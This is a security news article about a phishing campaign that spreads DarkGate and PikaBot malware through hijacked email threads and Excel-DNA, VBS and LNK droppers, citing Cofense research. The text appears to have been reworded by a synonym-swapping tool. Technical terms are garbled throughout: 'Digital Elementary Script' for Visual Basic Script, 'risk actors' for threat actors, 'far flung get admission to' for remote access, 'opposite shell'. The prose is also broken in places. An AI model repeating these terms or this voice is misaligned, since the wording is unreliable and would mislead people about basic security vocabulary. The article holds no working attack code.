An advanced phishing marketing campaign pushing the DarkGate malware infections has just lately added the PikaBot malware into the combination, making it essentially the most complicated phishing marketing campaign for the reason that Qakbot operation was once dismantled.
The malicious e mail marketing campaign began in September 2023, after the FBI seized and took down QBot’s (Qakbot) infrastructure.
In a brand new file through Cofense, researchers provide an explanation for that the DarkGate and Pikabot campaigns use techniques and methods very similar to earlier Qakbot campaigns, indicating that the Qbot risk actors have now moved directly to the more recent malware botnets.
As Qbot was once one of the vital pervasive malware botnets allotted via e mail, and each DarkGate and Pikabot are modular malware loaders with most of the similar options as Qbot, this poses a dire chance to the endeavor.
Like Qbot, the the brand new malware loaders will likely be utilized by risk actors to achieve preliminary get admission to to networks and prone to carry out ransomware, espionage, and information robbery assaults.
The DarkGate and Pikabot marketing campaign
During the last Summer time, there was a large building up in malicious emails pushing the DarkGate malware, with the risk actors switching to putting in Pikabot as the main payload in October 2023.
The phishing assault starts with an e mail that could be a answer or ahead of a stolen dialogue thread, which will increase the chance of the recipients treating the conversation with believe.
Customers clicking at the embedded URL undergo a sequence of exams that test they’re legitimate objectives after which advised the objective to obtain a ZIP archive containing a malware dropper that fetches the general payload from a far flung useful resource.
Cofense studies that the attackers experimented with more than one preliminary malware droppers to decide which goes the most productive, together with:
- Excel-DNA loader according to an open-source venture used for growing XLL information, exploited right here for downloading and working malware.
- VBS (Digital Elementary Script) downloaders that may execute malware via .vbs information in Microsoft Place of business paperwork or invoke command-line executables.
- LNK downloaders that abuse Microsoft shortcut information (.lnk) to obtain and execute malware.
The general payload utilized in those assaults was once the DarkGate malware via September 2023, which was once changed through PikaBot in October 2023.
DarkGate and PikaBot
DarkGate was once first documented in 2017, but it surely best changed into to be had to the wider cybercrime group this previous summer season, leading to a spike in its distribution via phishing and malvertising.
It’s a sophisticated modular malware that helps plenty of malicious behaviors, together with hVNC for far flung get admission to, cryptocurrency mining, opposite shell, keylogging, clipboard stealing, and data stealing (information, browser information).
PikaBot is a more recent malware first noticed in early 2023 that is composed of a loader and a core module, incorporating in depth anti-debugging, anti-VM, and anti-emulation mechanisms.
The malware profiles inflamed techniques and sends the information to its command and regulate (C2) infrastructure, looking ahead to additional directions.
The C2 sends instructions educating the malware to obtain and execute modules within the type of DLL or PE information, shellcode, or command-line instructions, so this can be a flexible device.
Cofense warns that the PikaBot and DarkGate campaigns are run through a professional risk actors whose talents are above the ones of unusual phishers, so organizations will have to familiarize themselves with the TTPs for this marketing campaign.